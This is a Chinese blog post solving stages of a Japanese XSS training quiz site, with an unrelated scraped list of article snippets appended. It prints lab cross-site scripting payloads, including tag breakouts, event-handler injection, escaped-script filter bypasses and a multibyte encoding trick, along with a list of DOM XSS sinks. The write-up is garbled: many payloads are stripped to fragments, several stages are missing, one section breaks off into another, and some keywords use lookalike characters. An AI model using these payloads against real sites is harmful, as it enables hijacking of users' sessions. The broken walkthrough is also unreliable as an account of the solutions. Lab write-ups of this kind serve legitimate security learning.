ouyangbro
ouyangbro

2013 XSS Challenges Stage 解题报告

xss: http://xss-quiz.int21h.jp/

这是一个日本的孩子写得xss测试关卡,一共19关,对大神来说可能没什么。。

但是对我这个小菜来说,感觉学到了很多东西。。

在解题的过程中,特别感谢蓝蓝大神的倾心指导。。

这次过关,也算是对xss的一个入门吧。。


==========================================================

1.

http://xss-quiz.int21h.jp/?sid=2a75ff06e0147586b7ceb0fe68ee443b86a6e7b9

Hint: very simple...

用IE浏览器:

1""1


2.

http://xss-quiz.int21h.jp/stage2.php?sid=f2d7d60125bdddb208fa757ee5cdae22f6818cd1
Hint: close the current tag and add SCRIPT tag...  

用IE浏览器:

1""1


3.

http://xss-quiz.int21h.jp/stage-3.php?sid=3cd1eb9b27daae73478e861bb2476768d7dda3b1
Hint: The input in text box is properly escaped.    


被过滤 
<  <
>  >
&  &
"  "
个人觉得,从搜索这方面已经没法绕过了


表单源代码如下: 

Search a place: 
  
Choose a country: 
We couldn't find any places called "<>#&" in Japan.

听别的大神说要绕过select。。。
尝试绕过select,在浏览器地址栏输入: 
javascript:void(document.forms[0].p2.childNodes[1].innerText='');
OK


4.
http://xss-quiz.int21h.jp/stage_4.php?sid=04fb39847db7e3f24b1287a4be7e22b1ba79ec74
Hint: invisible input field

修改hackme的那个input的type为text,
在输入框中输入: 
"/>"



5.
http://xss-quiz.int21h.jp/stage--5.php?sid=40b33710efa4a848d21b5a6dd47671e82c31d853
Hint: length limited text box

把maxlength=15改成:200
在输入框中输入: 
"/>"




6.
http://xss-quiz.int21h.jp/stage-no6.php?sid=236f8f125f43d1efffd8f96d6f8f5b590d880847
Hint: event handler attributes

提示是:event handler attributes
英语不好,乍一看被这三个单词唬住了。。
后来翻阅资料才知道:
类似:
就是event handler attributes...

输入框输入: 
" οnmοusemοve="alert(document.domain)

==================无聊别看==========================
Ps:
XSS利用的时候,分3大类

一、Features that allow scripting 特性 
Script tags:  
  
 发现题目把 
  
 <变成了< 
  
 >变成了> 
  
 怎么绕过<和>呢? 
  
 16进制编码: 
  
 < 变成了 \x3c  
  
 > 变成了 \x3e 
  
 
  
\x3cscript\x3ealert(document.domain);\x3c/script\x3e  ERROR
过滤了单个\ 
  
 
  
\\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e  OK
 
  
 
  
 16. 
  
 http://xss-quiz.int21h.jp/stage00000016.php?sid=4ba92c2b20cd3b70e153bf21a63f21391fe8d589 
  
 Hint: "document.write();" and "s/\\x/\\\\x/ig;"   
  
 
  
 这个正则摆明了就是要吃掉16进制,我们换其他的表达方式:十进制\60, \u003c 
  
 为什么这里要两个\\,是为了在写我们插入的代码的时候换一个\ 
  
 
  
\\60script\\62alert(document.domain);\\60/script\\62                       ERROR 
\\0060script\\0062alert(document.domain);\\0060/script\\0062        ERROR
\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e  OK
 
  
 在这里把能引起Dom XSS的入口函数总结下: 
  
 
  
document.write()  
document.writeln()  
document.body.innerHtml  
eval()  
window.execScript()  
window.setInterval()  
window.setTimeout() 
 
  
 
  
 17. 
  
 http://xss-quiz.int21h.jp/stage-No17.php?sid=ba90ec457c25fad90c2715a86fe3a07be846dc7f 
  
 Hint: multi-byte character 
  
 
  
 半角片假名使用两个字节来表示。 
  
 
  
“第一位字节”使用0x8E
“第二位字节”使用0xA1-0xDF
 
  
 JIS X 0208字元使用两个字节来表示。 
  
 
  
“第一位字节”使用0xA1-0xFE
“第二位字节”使用0xA1-0xFE
 
  
 JIS X 0212字元使用三个字节来表示。 
  
 
  
“第一位字节”使用0x8F
“第二位字节”使用0xA1-0xFE
“第三位字节”使用0xA1-0xFE
 
  
 双引号是0x22,这道题应该在Name框中使用某个东东吃掉Name框第二个“ 
  
 然后和Mail框的第一个“闭合 
  
 看了下别人的答案,思路都差不多: 
  
 最终效果: 
  
1%A7&p2=+onmouseover%3Dalert%28document.domain%29%3B+%A7
但是版本问题,没法显示。。 
  

 
  
Ps:楼上的%A7,是要抓包,修改的,而不是在请求的时候修改,记得把length修改对。
 
  
Ps:楼上的%A7,是随意的,只要是符合上面说的第一个字节范围即可。。
 
  

 
  
18.
 
  
http://xss-quiz.int21h.jp/stage__No18.php?sid=4293f3e546c32c4dc375b8063896254e64fc9198
 Hint: us-ascii high bit issue
 
  
本来没什么思路,看了下别人的答案,大概知道了:
 
  
就是把最高位置为1即可
 
  
比如说:
 
  
< 的16进制是3C,2进制是0011 1011,最高位置为1之后,变成1011 1011 ,也就是BC
 
  
> 同理变成BE
 
  
“ 同理变成A2
 
  
所以:
 
  
 
  
">

你可能感兴趣的:(安全)

  • Oracle 12c 及以上版本补丁更新说明及下载方法 zd1320732 oracleoracle12c补丁更新
    参考下面的文章,会对补丁更新的流程有一定的了解。https://www.modb.pro/db/27255RU(ReleaseUpdates)是每一个季度的版本升级。包括:最新的BUG修复最新的安全漏洞补丁最新添加的功能以19c为例,对应的升级版本升级路线是(19.1.0.0.0->19.2.0.0.0->19.3.0.0.0…)到现在是19.8.0.0.0RUR是对RU的修订版本,包括:最新的B
  • leetcode198打家劫舍 悟空丶123 golang后端算法
    题目描述LeetCode第198题——打家劫舍(HouseRobber)你是一个职业小偷,计划偷窃沿街的房屋。每间房内都藏有一定的现金,这个地方所有的房屋都围成一圈,并且相邻的房屋有安全系统会相连,如果两间相邻的房屋在同一晚上被打劫,系统会自动报警。给定一个代表每个房屋存放金额的非负整数数组,计算你在不触动警报装置的情况下,能够偷窃到的最高金额。示例1:输入:[1,2,3,1]输出:4解释:偷窃1
  • 钱是理想的魔咒?为人类造福的openAI十亿美元卖身商业资本 机智客
    OpenAI是如何因为10亿美元出卖自己的灵魂的文章在Reddit上刷爆了。有句经典的话叫做,欲戴王冠,必承其重。可能用在AI领域的OpenAI身上再适合不过了,OpenAI这个曾经以“为人类造福”伟大宗旨为信条的非营利组织,营利了。这大概可能就是诠释了野心越大,可能相应的成本和之后的代价就越大。曾经,OpenAI定位非营利组织,要以安全的方式实现通用人工智能,用技术的方式为人类整体谋福,让人类平
  • 网络安全学习路线图(2024版详解) 白帽子008 web安全学习安全网络网络安全
    近期,大家在网上对于网络安全讨论比较多,想要学习的人也不少,但是需要学习哪些内容,按照什么顺序去学习呢?其实我们已经出国多版本的网络安全学习路线图,一直以来效果也比较不错,本次我们针对市场需求,整理了一套系统的网络安全学习路线图,供大家学习参考。希望大家按照路线图进行系统学习不仅可以更高效的完成上岸,还能够系统化学习,提升自己的后期竞争力。第一阶段:数通安全Windows系统安全1.企业资产安全规
  • 2024年网络安全最新疫情过后,这个行业人才缺口达327万,还不赶紧入行拿高薪 网络安全_入门教程 web安全安全网络安全
    前段时间,西工大事件刷屏,很多人才突然意识到我国网络空间安全面临的形势有多恶劣。当前,国际网络空间对抗趋势越发凸显,我们面对的不再是散兵游勇式的攻击,而是以窃取敏感数据、破坏关键信息技术设施为目标的有组织的国际间的网络攻击。零日漏洞、供应链攻击、数据泄露等重大安全事件层出不穷。我国正在迎来数字经济的发展浪潮,千行百业的数字化转型,都需要有网络安全的坚实保障。但,网络安全人才短缺的问题已经困扰企业多
  • API技术简介与开发趋势 APItesterCris 数据挖掘API接口分享数据库大数据开发语言数据挖掘前端
    在当今的数字化时代,API(应用程序编程接口)技术已成为连接不同软件和服务的关键技术。API允许不同的应用程序之间进行交互,共享数据和功能,极大地提升了软件开发的效率和可扩展性。随着技术的进步和市场需求的变化,API开发呈现出一些新的趋势。API技术的基本概念不难理解。简单来说,API是一组规则和协议,用于定义软件组件如何与其他组件交互。通过API,开发者可以让一个程序安全地调用另一个程序的功能或
  • 从零开始学习黑客技术,看这一篇就够了 网络安全-旭师兄 学习安全开源web安全网络
    黑客,对于很多人来说,是一个神秘的代名词,加之影视作品夸张的艺术表现,使得黑客这个本来只专注于技术的群体,散发出亦正亦邪的神秘色彩。黑客源自英文hacker一词,最初曾指热心于计算机技术、水平高超的电脑高手,尤其是程序设计人员,逐渐区分为白帽、灰帽、黑帽等。其中,白帽黑客被称为道德黑客。他们不会非法入侵用户网络,而是通过一系列测试检查公司安全系统的效率;黑帽黑客恰好与白帽黑客相反,他们往往为了个人
  • 2024网络安全学习路线 非常详细 推荐学习 白帽黑客-晨哥 web安全学习安全数据库php
    关键词:网络安全入门、渗透测试学习、零基础学安全、网络安全学习路线首先咱们聊聊,学习网络安全方向通常会有哪些问题1、打基础时间太长学基础花费很长时间,光语言都有几门,有些人会倒在学习linux系统及命令的路上,更多的人会倒在学习语言上;2、知识点掌握程度不清楚对于网络安全基础内容,很多人不清楚需要学到什么程度,囫囵吞枣,导致在基础上花费太多时间;看到很多小伙伴,买了HTML,PHP,数据库,计算机
  • 入门网络安全工程师要学习哪些内容 白帽黑客2659 web安全学习安全网安入门网络安全
    大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对网络安全工程师还是不了解,不知道网络安全工程师需要学什么?知了堂小编总结出以下要点。网络安全工程师是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和渗透测试工程师不一样,如果你想成为安全开发工程师,学的侧重点就和安全运维工程师不一样。网络安全工程师学的东
  • 【系统分析师】-安全体系 宣晨光 系统分析师软考真题标签安全软考系统分析
    考点综述(1)综合知识:包括加密密钥和公开密钥算法:计算机病毒及防治技术计算机犯罪基本概念与防范措施、入侵检测与防范、系统访问控制技术;信息删除、修改、插入和丢失;伪造与重放攻击的防止;SHA、MD5;私有信息保护。(2)案例:根据具体案例,说明在网络与分布式环境下的分布式应用系统在安全性方面需要考虑的因素。(3)论文:包括入侵检测、VPN、安全协议(IPSec、SSL、PGP、HTTPSSSL)
  • 速盾:普通cdn和高防cdn差别在哪里? 速盾cdn 网络安全运维
    CDN(ContentDeliveryNetwork)是一种通过在全球各个位置部署服务器来提供快速内容传输服务的网络架构。普通CDN和高防CDN都是CDN服务的两种类型,它们的主要差别体现在以下几个方面。首先,普通CDN和高防CDN的安全性不同。普通CDN主要用于加速内容传输,对于网络安全的防护能力较弱。而高防CDN则专注于提供更强的安全防护,包括抵御DDoS攻击、CC攻击等网络攻击形式。高防CD
  • 速盾高防cdn是怎么解决网站攻击的? 速盾cdn web安全安全ddos
    速盾高防CDN是一种基于云计算技术的网络安全解决方案,可以有效地保护网站免受各种网络攻击的威胁。它通过在全球多个节点部署服务器,将网站内容缓存到这些服务器上,并通过智能路由技术将用户的请求引导到最近的服务器上,以提供更快的访问速度和更好的网络性能。速盾高防CDN主要采用以下几种方式来解决网站攻击:分布式拒绝服务攻击(DDoS)防护:DDoS攻击是一种常见的网络攻击手段,攻击者通过向目标网站发送大量
  • 速盾:高防CDN是怎样防御的? 速盾cdn 网络web安全安全
    随着互联网的快速发展,网站安全问题也日益突出。为了保护网站避免遭受恶意攻击,高防CDN(ContentDeliveryNetwork)应运而生。高防CDN通过一系列的安全防护措施来保护网站免受DDoS(分布式拒绝服务)和其他恶意攻击的影响。首先,高防CDN提供了分布式架构,将网站的内容和流量分散到全球各地的节点服务器中。这样做的目的是为了分散攻击者对网站的恶意访问,并避免单点故障。当攻击发生时,高
  • 速盾:全面分析高防 CDN 和 CDN 对比? 速盾cdn 网络运维web安全
    在当今数字化时代,网站的性能和安全性对于企业和个人来说至关重要。为了提高网站的访问速度和安全性,许多人会选择使用CDN(ContentDeliveryNetwork,内容分发网络)或高防CDN。那么,高防CDN和普通CDN有什么区别呢?下面我们来进行全面分析。一、CDN的基本概念和作用CDN的定义CDN是一种分布式的网络架构,它通过在全球各地部署服务器节点,将网站的内容缓存到这些节点上。当用户访问
  • 某金融企业生产环境下信创数据库运维管理规范 罗伯特之技术屋 VIP专栏数据库金融运维
    数据是企业的生命线,企业为了保障数据库的稳定运行和数据的安全,设计一套数据库运维管理规范非常关键。信创浪潮来临后,在金融业中,IT技术部门更应尽快熟悉掌握信创数据库的管理技术,并形成规范化的数据库运维管理体系。信创数据库的运维管理,更需做好规划配置管理、监控管理、容灾备份管理、安全管理,并形成规范。合理的运维管理规范不仅能够提高信创数据库的管理效率和运行性能,还能够提高信创数据库的稳定性,保障数据
  • 斯尔福智慧实验室三阶段详解 斯尔福实验室设备 大数据
    未来二十时间,实验室智能化是各类实验室的发展方向。在这样的时代背景下,斯尔福提出设计建造更安全、舒适、高效、节能的智慧实验室,是整个实验室设计、建设的核心目地。斯尔福将智慧实验室分为3个阶段。如何实现实验室信息数据智能化,LEMS实验室智能环境设施管理系统,以实验室为中心,采用先进的计算机网络技术、数据库技术以及三维仿真技术,将实验室整体环境,包括设备。人员。危险物等数据,结合实验室用户标准化管理
  • c++使用_beginthreadex创建线程 梦想患者 功能开发小技巧c++Thread
    记录使用_beginthreadex(),来创建线程。方便后期的使用。创建一个线程相关函数介绍unsignedlong_beginthreadex(void*security,//安全属性,为NULL时表示默认安全性unsignedstack_size,//线程的堆栈大小,一般默认为0unsigned(_stdcall*start_address)(void*),//所要启动的线程函数void*a
  • 2024年网络安全工程师的发展前景如何?红利还有吗? 程序员小予 web安全网络安全网络安全系统安全计算机网络密码学
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包2021年7月12日工信部发布的《网络安全产业高质量发展三年行动计划(2021-2023年)》,文件中提出,2023年网络安全产业规模超过2500亿元,年复合增长率超过15%。一批网络安全关键核心技术实现突破,达到先进水平。网络安全技术创新能力明显提高,产品和服务水平不断提升,经济社会网络安全需求加快释放,产融合作精准高效,网络安全人
  • 数据库服务器运维最佳实践 bigbig猩猩 数据库运维服务器
    数据库服务器运维是确保数据库系统高效、稳定和安全运行的关键环节。随着信息技术的不断发展,数据库系统的规模和复杂性不断增加,对运维工作的要求也越来越高。以下将从硬件选择、操作系统和文件系统优化、数据库版本选择、参数优化、数据备份与恢复、性能监控与调优、安全管理以及高可用性和灾难恢复等方面详细介绍数据库服务器运维的最佳实践。一、硬件选择1.CPU选择多核高主频的处理器是保障数据库性能的基础。数据库服务
  • web安全学习笔记(1) 头发的天敌是代码 web安全学习笔记web安全学习笔记
    一、网络安全分支1.web安全——网站2.二进制安全物联网安全工控安全二、网站是如何搭建起来的1.服务器服务器与我们的家庭使用电脑有什么区别?①没有显卡②CPU+内存不同于家庭电脑2.操作系统家庭系统:WindowsXPWindows7Windows8Windows9Windows10Windows11服务器操作系统:Windows2000Windows2003Windows2008Windows
  • Web安全与网络安全:SQL漏洞注入 hong161688 web安全sqloracle
    Web安全与网络安全:SQL漏洞注入引言在Web安全领域,SQL注入漏洞(SQLInjectionVulnerability)是一种极具破坏性的安全威胁。它允许攻击者通过向Web应用程序的输入字段中插入或“注入”恶意的SQL代码片段,从而操纵后台数据库系统,执行未授权的数据库查询,甚至可能获取数据库管理权限,进而对整个系统造成严重的安全损害。本文将从SQL注入的原理、分类、危害及防御策略等方面进行
  • 科技园区及科研实验室智能消防安全管控系统 三儿儿儿 物联网人工智能数据分析
    实验室是研究所开展科研活动的重要场所,保障实验室安全是科研工作顺利开展的必要条件和坚实基础,长期以来,实验室安全工作涉及危险化学品的监督管理,化学品的技术安全管理,以及实验室消防、环保等多方面的内容。实验室存放和使用的化学试剂和气瓶种类繁多,且极具危险性,一旦实验环境中存在不安全因素,便可能引发火灾、爆炸等安全事故,而传统的安全管理模式以人的管理和主观经验为主,主观性判断占据主导因素安全管理的工作
  • 网络安全工程师自主学习计划表(具体到阶段目标) 大模型综述 web安全网络安全系统安全安全学习
    前言接下来我将给大家分享一份网络安全工程师自学计划指南,全文将从学习路线、学习规划、学习方法三个方向来讲述零基础小白如何通过自学进阶网络安全工程师,全文篇幅有点长,同学们可以先点个收藏,以免日后错过了。目录前言学习路线学习规划初级1、网络安全理论知识(2天)2、渗透测试基础(1周)3、操作系统基础(1周)4、计算机网络基础(1周)5、数据库基础操作(2天)6、Web渗透(1周)中级、高级7、脚本编
  • 新加坡 - A Fine City 小土也
    前两天和朋友吃饭,聊到了各自对新加坡的看法,发现这个城市真是让人又爱又恨。我曾经在新加坡学习4年,后又去英国学习3年,期间也去过不少欧洲的城市。和其它去过的城市相比,新加坡可以说是最安全的一个城市了,犯罪率非常低,真的达到了夜不闭户的程度。曾经住过寄宿家庭,晚上真的不锁门。然而,这种安全感对于人们的生活和商业发展固然是非常好的,但也造成了人们自由度的被压缩。比如,新加坡全面禁烟,就连室外的遮雨棚下
  • Java基础——深入理解Java中的多线程(超级详细,值得你看) 2401_84558508 作者\/java开发语言
    开发中优先选择实现Runnable方式原因:实现的方式没有类的单继承性的局限性实现的方式更适合来处理多个线程共享数据的情况相同点:都需要重写run(),将线程要执行的代码声明在run()方法中线程的生命周期解决线程安全问题;使用同步代码块packagecom.haust.java;/*出现线程安全问他的解决方法:当一个线程a在操作ticket的时候,其他线程不能参与进来,直到线程参与进来,也操作完
  • Linux系统管理及应用软件实施与运维 无敌霸王龙 运维linux服务器centos数据库mysql
    一、引言随着信息技术的迅猛发展,Linux操作系统在企业和个人用户中的应用越来越广泛。Linux以其开放源代码、稳定可靠、安全性高等特点成为许多用户的首选操作系统。而随着Linux应用范围的不断扩大,对于Linux系统管理及应用软件的实施与运维也越来越受到重视。本文将介绍Linux系统管理的基本概念、常用工具及技术,以及针对不同应用场景下的实施与运维策略。通过对Linux系统管理的深入理解,可以帮
  • 速盾:你知道高防 IP 和高防 CDN 的区别吗? 速盾cdn tcp/ip网络安全
    在当今网络安全形势日益严峻的情况下,网站的安全防护成为了企业和个人关注的焦点。高防IP和高防CDN作为两种常见的网络安全防护手段,被广泛应用于网站的安全防护中。那么,高防IP和高防CDN有什么区别呢?防护网站哪个更好呢?一、高防IP和高防CDN的定义高防IP高防IP是一种针对IP地址的网络安全防护服务。它通过将用户的网站IP地址替换为高防IP地址,将攻击流量引流到高防IP上进行清洗和过滤,只将合法
  • linux-用户与权限管理-用户管理 Flying_Fish_Xuan linux运维服务器
    Linux用户与权限管理——用户管理详解在Linux系统中,用户管理和权限控制是保证系统安全和资源有效利用的基础。用户管理涉及到创建用户、删除用户、修改用户属性、用户组管理等内容。1.Linux用户体系概述在Linux系统中,所有操作都与用户相关联。用户可以是人、进程或系统程序,操作系统通过用户身份来进行权限和资源的分配。Linux系统将用户分为以下几类:超级用户(Superuser):通常是ro
  • Windows和浏览器的命令与快捷键 伍嘉源 Windowswindows
    Windows和浏览器的命令与快捷键一、运行常用命令二、cmd常用命令(cmd的命令是运行的命令的超集)三、Windows快捷键1、Win键2、Ctrl键3、Alt键4、F键四、浏览器快捷键五、关闭Windows防火墙、安全中心和自动更新一、运行常用命令1.基本命令cmd打开命令提示符(cmd命令行控制台)control打开控制面板regedit打开注册表编辑器2.打开系统自带工具mspaint打
  • 童年期早期至中期:适应不良模式 瓦尔妲的星辰
    (摘自《儿童心理学手册》第六版第三卷第9章【自我】)适应不良模式依恋研究对三类与非安全型依恋模式相关的不理想的父母养育风格做了进一步的区分。这三类父母养育的儿童被描述为(1)回避型依恋(2)矛盾型依恋(3)紊乱型依恋焦虑-回避型风格使幼儿感到无法接近母亲,无法获得母亲的照料和正性情感。儿童觉得母亲无法及时满足自己的需要,当儿童痛苦时,母亲会转身离开,甚至大光其火。由于感受不到爱,儿童切断了自我与威
  • eclipse maven IXHONG eclipse
    eclipse中使用maven插件的时候,运行run as maven build的时候报错 -Dmaven.multiModuleProjectDirectory system propery is not set. Check $M2_HOME environment variable and mvn script match.   可以设一个环境变量M2_HOME指
  • timer cancel方法的一个小实例 alleni123 多线程timer
    package com.lj.timer; import java.util.Date; import java.util.Timer; import java.util.TimerTask; public class MyTimer extends TimerTask { private int a; private Timer timer; pub
  • MySQL数据库在Linux下的安装 ducklsl mysql
    1.建好一个专门放置MySQL的目录 /mysql/db数据库目录 /mysql/data数据库数据文件目录 2.配置用户,添加专门的MySQL管理用户 >groupadd mysql ----添加用户组 >useradd -g mysql mysql ----在mysql用户组中添加一个mysql用户 3.配置,生成并安装MySQL >cmake -D
  • spring------>>cvc-elt.1: Cannot find the declaration of element Array_06 springbean
    将-------- <?xml version="1.0" encoding="UTF-8"?> <beans xmlns="http://www.springframework.org/schema/beans"     xmlns:xsi="http://www.w3
  • maven发布第三方jar的一些问题 cugfy maven
    maven中发布 第三方jar到nexus仓库使用的是 deploy:deploy-file命令 有许多参数,具体可查看 http://maven.apache.org/plugins/maven-deploy-plugin/deploy-file-mojo.html 以下是一个例子: mvn  deploy:deploy-file -DgroupId=xpp3
  • MYSQL下载及安装 357029540 mysql
        好久没有去安装过MYSQL,今天自己在安装完MYSQL过后用navicat for mysql去厕测试链接的时候出现了10061的问题,因为的的MYSQL是最新版本为5.6.24,所以下载的文件夹里没有my.ini文件,所以在网上找了很多方法还是没有找到怎么解决问题,最后看到了一篇百度经验里有这个的介绍,按照其步骤也完成了安装,在这里给大家分享下这个链接的地址
  • ios TableView cell的布局 张亚雄 tableview
      cell.imageView.image = [UIImage imageNamed:[imageArray objectAtIndex:[indexPath row]]];           CGSize itemSize = CGSizeMake(60, 50);   &nbs
  • Java编码转义 adminjun java编码转义
    import java.io.UnsupportedEncodingException; /** * 转换字符串的编码 */ public class ChangeCharset { /** 7位ASCII字符,也叫作ISO646-US、Unicode字符集的基本拉丁块 */ public static final Strin
  • Tomcat 配置和spring aijuans spring
    简介 Tomcat启动时,先找系统变量CATALINA_BASE,如果没有,则找CATALINA_HOME。然后找这个变量所指的目录下的conf文件夹,从中读取配置文件。最重要的配置文件:server.xml 。要配置tomcat,基本上了解server.xml,context.xml和web.xml。 Server.xml --  tomcat主
  • Java打印当前目录下的所有子目录和文件 ayaoxinchao 递归File
    其实这个没啥技术含量,大湿们不要操笑哦,只是做一个简单的记录,简单用了一下递归算法。   import java.io.File; /** * @author Perlin * @date 2014-6-30 */ public class PrintDirectory { public static void printDirectory(File f
  • linux安装mysql出现libs报冲突解决 BigBird2012 linux
    linux安装mysql出现libs报冲突解决 安装mysql出现 file /usr/share/mysql/ukrainian/errmsg.sys from install of MySQL-server-5.5.33-1.linux2.6.i386 conflicts with file from package mysql-libs-5.1.61-4.el6.i686  
  • jedis连接池使用实例 bijian1013 redisjedis连接池jedis
    实例代码: package com.bijian.study; import java.util.ArrayList; import java.util.List; import redis.clients.jedis.Jedis; import redis.clients.jedis.JedisPool; import redis.clients.jedis.JedisPoo
  • 关于朋友 bingyingao 朋友兴趣爱好维持
      成为朋友的必要条件:    志相同,道不合,可以成为朋友。譬如马云、周星驰一个是商人,一个是影星,可谓道不同,但都很有梦想,都要在各自领域里做到最好,当他们遇到一起,互相欣赏,可以畅谈两个小时。     志不同,道相合,也可以成为朋友。譬如有时候看到两个一个成绩很好每次考试争做第一,一个成绩很差的同学是好朋友。他们志向不相同,但他
  • 【Spark七十九】Spark RDD API一 bit1129 spark
    aggregate package spark.examples.rddapi import org.apache.spark.{SparkConf, SparkContext} //测试RDD的aggregate方法 object AggregateTest { def main(args: Array[String]) { val conf = new Spar
  • ktap 0.1 released bookjovi kerneltracing
    Dear, I'm pleased to announce that ktap release v0.1, this is the first official release of ktap project, it is expected that this release is not fully functional or very stable and we welcome bu
  • 能保存Properties文件注释的Properties工具类 BrokenDreams properties
            今天遇到一个小需求:由于java.util.Properties读取属性文件时会忽略注释,当写回去的时候,注释都没了。恰好一个项目中的配置文件会在部署后被某个Java程序修改一下,但修改了之后注释全没了,可能会给以后的参数调整带来困难。所以要解决这个问题。     &nb
  • 读《研磨设计模式》-代码笔记-外观模式-Facade bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ /* * 百度百科的定义: * Facade(外观)模式为子系统中的各类(或结构与方法)提供一个简明一致的界面, * 隐藏子系统的复杂性,使子系统更加容易使用。他是为子系统中的一组接口所提供的一个一致的界面 * * 可简单地
  • After Effects教程收集 cherishLC After Effects
    1、中文入门 http://study.163.com/course/courseMain.htm?courseId=730009 2、videocopilot英文入门教程(中文字幕) http://www.youku.com/playlist_show/id_17893193.html 英文原址: http://www.videocopilot.net/basic/ 素
  • Linux Apache 安装过程 crabdave apache
    Linux Apache 安装过程   下载新版本: apr-1.4.2.tar.gz(下载网站:http://apr.apache.org/download.cgi) apr-util-1.3.9.tar.gz(下载网站:http://apr.apache.org/download.cgi) httpd-2.2.15.tar.gz(下载网站:http://httpd.apac
  • Shell学习 之 变量赋值和引用 daizj shell变量引用赋值
    本文转自:http://www.cnblogs.com/papam/articles/1548679.html Shell编程中,使用变量无需事先声明,同时变量名的命名须遵循如下规则: 首个字符必须为字母(a-z,A-Z) 中间不能有空格,可以使用下划线(_) 不能使用标点符号 不能使用bash里的关键字(可用help命令查看保留关键字) 需要给变量赋值时,可以这么写:
  • Java SE 第一讲(Java SE入门、JDK的下载与安装、第一个Java程序、Java程序的编译与执行) dcj3sjt126com javajdk
    Java SE 第一讲: Java SE:Java Standard Edition Java ME: Java Mobile Edition Java EE:Java Enterprise Edition Java是由Sun公司推出的(今年初被Oracle公司收购)。 收购价格:74亿美金 J2SE、J2ME、J2EE JDK:Java Development
  • YII给用户登录加上验证码 dcj3sjt126com yii
    1、在SiteController中添加如下代码: /** * Declares class-based actions. */ public function actions() { return array( // captcha action renders the CAPTCHA image displ
  • Lucene使用说明 dyy_gusi Lucenesearch分词器
    Lucene使用说明 1、lucene简介 1.1、什么是lucene     Lucene是一个全文搜索框架,而不是应用产品。因此它并不像baidu或者googleDesktop那种拿来就能用,它只是提供了一种工具让你能实现这些产品和功能。 1.2、lucene能做什么     要回答这个问题,先要了解lucene的本质。实际
  • 学习编程并不难,做到以下几点即可! gcq511120594 数据结构编程算法
    不论你是想自己设计游戏,还是开发iPhone或安卓手机上的应用,还是仅仅为了娱乐,学习编程语言都是一条必经之路。编程语言种类繁多,用途各 异,然而一旦掌握其中之一,其他的也就迎刃而解。作为初学者,你可能要先从Java或HTML开始学,一旦掌握了一门编程语言,你就发挥无穷的想象,开发 各种神奇的软件啦。 1、确定目标 学习编程语言既充满乐趣,又充满挑战。有些花费多年时间学习一门编程语言的大学生到
  • Java面试十问之三:Java与C++内存回收机制的差别 HNUlanwei javaC++finalize()堆栈内存回收
    大家知道, Java 除了那 8 种基本类型以外,其他都是对象类型(又称为引用类型)的数据。 JVM 会把程序创建的对象存放在堆空间中,那什么又是堆空间呢?其实,堆( Heap)是一个运行时的数据存储区,从它可以分配大小各异的空间。一般,运行时的数据存储区有堆( Heap)和堆栈( Stack),所以要先看它们里面可以分配哪些类型的对象实体,然后才知道如何均衡使用这两种存储区。一般来说,栈中存放的
  • 第二章 Nginx+Lua开发入门 jinnianshilongnian nginxlua
    Nginx入门 本文目的是学习Nginx+Lua开发,对于Nginx基本知识可以参考如下文章: nginx启动、关闭、重启 http://www.cnblogs.com/derekchen/archive/2011/02/17/1957209.html agentzh 的 Nginx 教程 http://openresty.org/download/agentzh-nginx-tutor
  • MongoDB windows安装 基本命令 liyonghui160com
      windows安装    安装目录:   D:\MongoDB\   新建目录   D:\MongoDB\data\db   4.启动进城:   cd D:\MongoDB\bin   mongod -dbpath D:\MongoDB\data\db   &n
  • Linux下通过源码编译安装程序 pda158 linux
    一、程序的组成部分   Linux下程序大都是由以下几部分组成:   二进制文件:也就是可以运行的程序文件   库文件:就是通常我们见到的lib目录下的文件   配置文件:这个不必多说,都知道   帮助文档:通常是我们在linux下用man命令查看的命令的文档    二、linux下程序的存放目录   linux程序的存放目录大致有三个地方:   /etc, /b
  • WEB开发编程的职业生涯4个阶段 shw3588 编程Web工作生活
    觉得自己什么都会 2007年从学校毕业,凭借自己原创的ASP毕业设计,以为自己很厉害似的,信心满满去东莞找工作,找面试成功率确实很高,只是工资不高,但依旧无法磨灭那过分的自信,那时候什么考勤系统、什么OA系统、什么ERP,什么都觉得有信心,这样的生涯大概持续了约一年。 根本不是自己想的那样 2008年开始接触很多工作相关的东西,发现太多东西自己根本不会,都需要去学,不管是asp还是js,
  • 遭遇jsonp同域下变作post请求的坑 vb2005xu jsonp同域post
    今天迁移一个站点时遇到一个坑爹问题,同一个jsonp接口在跨域时都能调用成功,但是在同域下调用虽然成功,但是数据却有问题. 此处贴出我的后端代码片段 $mi_id = htmlspecialchars(trim($_GET['mi_id '])); $mi_cv = htmlspecialchars(trim($_GET['mi_cv ']));  贴出我前端代码片段: $.aj